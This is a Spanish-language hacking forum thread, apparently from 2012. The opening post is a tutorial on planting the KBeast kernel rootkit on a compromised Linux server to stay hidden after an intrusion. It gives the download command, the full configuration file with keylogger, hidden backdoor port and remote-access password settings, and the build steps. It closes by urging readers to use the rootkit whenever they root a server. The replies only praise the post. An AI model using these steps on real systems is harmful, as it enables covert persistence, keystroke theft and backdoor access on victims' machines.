comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[KBEAST] Plantando un Rootkit

  • 9 Respuestas
  • 3852 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Octubre 02, 2012, 09:36:10 pm »
Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios

-Ocultar procesos de (ps, pstree, top, lsof)

- Ocultar puertos locales abiertos (backdoors)

-Viene con un modulo keylogger incorporado para capturar las pulsaciones.

-Anti-kill para procesos

-Anti-remove para archivos

-Trae un backdoor bind incorporado

- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.


bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)

descargamos el rootkit.

Código: Bash
  1. wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz




una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h


Código: Text
  1. /*
  2. Kernel Beast Ver #1.0 - Configuration File
  3. Copyright Ph03n1X of IPSECS (c) 2011
  4. Get more research of ours http://ipsecs.com
  5. */
  6.  
  7. /*Don't change this line*/
  8. #define TRUE 1
  9. #define FALSE 0
  10.  
  11. /*
  12. Enable keylog probably makes the system unstable
  13. But worth to be tried
  14. */
  15. #define _KEYLOG_ TRUE
  16.  
  17. /*Define your module & network daemon name*/
  18. #define KBEAST "kbeast"
  19.  
  20. /*
  21. All files, dirs, process will be hidden
  22. Protected from deletion & being killed
  23. */
  24. #define _H4X0R_ "_h4x_"
  25.  
  26. /*
  27. Directory where your rootkit will be saved
  28. You have to use _H4X0R_ in your directory name
  29. No slash (/) at the end
  30. */
  31. #define _H4X_PATH_ "/usr/_h4x_"
  32.  
  33. /*
  34. File to save key logged data
  35. */
  36. #define _LOGFILE_ "acctlog"
  37.  
  38. /*
  39. This port will be hidded from netstat
  40. */
  41. #define _HIDE_PORT_ 13377
  42.  
  43. /*
  44. Password for remote access
  45. */
  46. #define _RPASSWORD_ "h4x3d"
  47. #define _MAGIC_NAME_ "bin"
  48. /*
  49. Magic signal & pid for local escalation
  50. */
  51. #define _MAGIC_SIG_ 37 //kill signal
  52. #define _MAGIC_PID_ 31337 //kill this pid

prosigo a explicar la funcion de cada linea en el fichero de configuracion.


1- La primera linea la dejamos tal cual esta

2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos

Código: Text
  1. #define _KEYLOG_ FALSE


3- se encarga de darle el nombre al daemon rootkit


Código: Text
  1. #define KBEAST "q3rv0"

4 - En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.

Código: Text
  1. #define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"

5- Define el directorio donde se guardara KBeast

Código: Text
  1. #define _H4X_PATH_ "/usr/share/kbeast"


6 - Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger

Código: Text
  1. #define _LOGFILE_ "acctlog"

7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.

Código: Text
  1. #define _HIDE_PORT_ 6666

8- Incluimos el password para el acceso con el backdoor.

Código: Text
  1. #define _RPASSWORD_ "q3rv0"
  2. #define _MAGIC_NAME_ "bin"

Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.


Procedemos a lanzar el rootkit de la siguiente manera.

En los kernel 2.6.18

Código: Bash
  1. ./setup buil 0

En los 2.6.32 como es mi caso

Código: Bash
  1. ./setup build





Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.

-Verificando la proteccion anti-remove de ficheros




- Directorio donde se guarda el rootkit en el systema




- Pulsaciones capturadas por el modulo keylogger...
  El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.





- Port 6666 Hide




- Accediendo al sistema a travez del backdoor en el puerto 6666




- oka, para remover el rootkit del kernel solo basta realizar un:

Código: Bash
  1. ./setup clean


 

Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast :)


Saludos!











« Última modificación: Noviembre 23, 2014, 01:18:55 pm por Expermicid »
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Octubre 02, 2012, 10:08:39 pm »
Buenisimo man! terrible aporte!
+Karma!
Segui asi!


Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Octubre 02, 2012, 10:53:07 pm »
Buen aporte man! Gracias

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado x4r0r

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Octubre 03, 2012, 12:10:15 am »
buen aporte man se agradece mucho
¡ aprender de los errores , llegaria muy lejos !

Desconectado Barym

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Octubre 03, 2012, 12:38:23 pm »
Muchas gracias por el aporte  ;D

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #5 en: Octubre 03, 2012, 02:08:31 pm »
Brutal man.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #6 en: Octubre 05, 2012, 12:49:41 am »
 :o Brutal

Gracias por compartir

saludos
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #7 en: Octubre 05, 2012, 01:08:40 am »
Muy buena wachin
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Mr_Pack

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • r00tc0d3rs
    • Email
« Respuesta #8 en: Octubre 25, 2012, 02:02:19 pm »
Bien !!! como te dije en tu web está genial el tuto !! ;)
gracias por compartir
____________________________

my best crime is myself

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« Respuesta #9 en: Octubre 25, 2012, 07:07:55 pm »
bueeeen post completito para mi :D

 

¿Te gustó el post? COMPARTILO!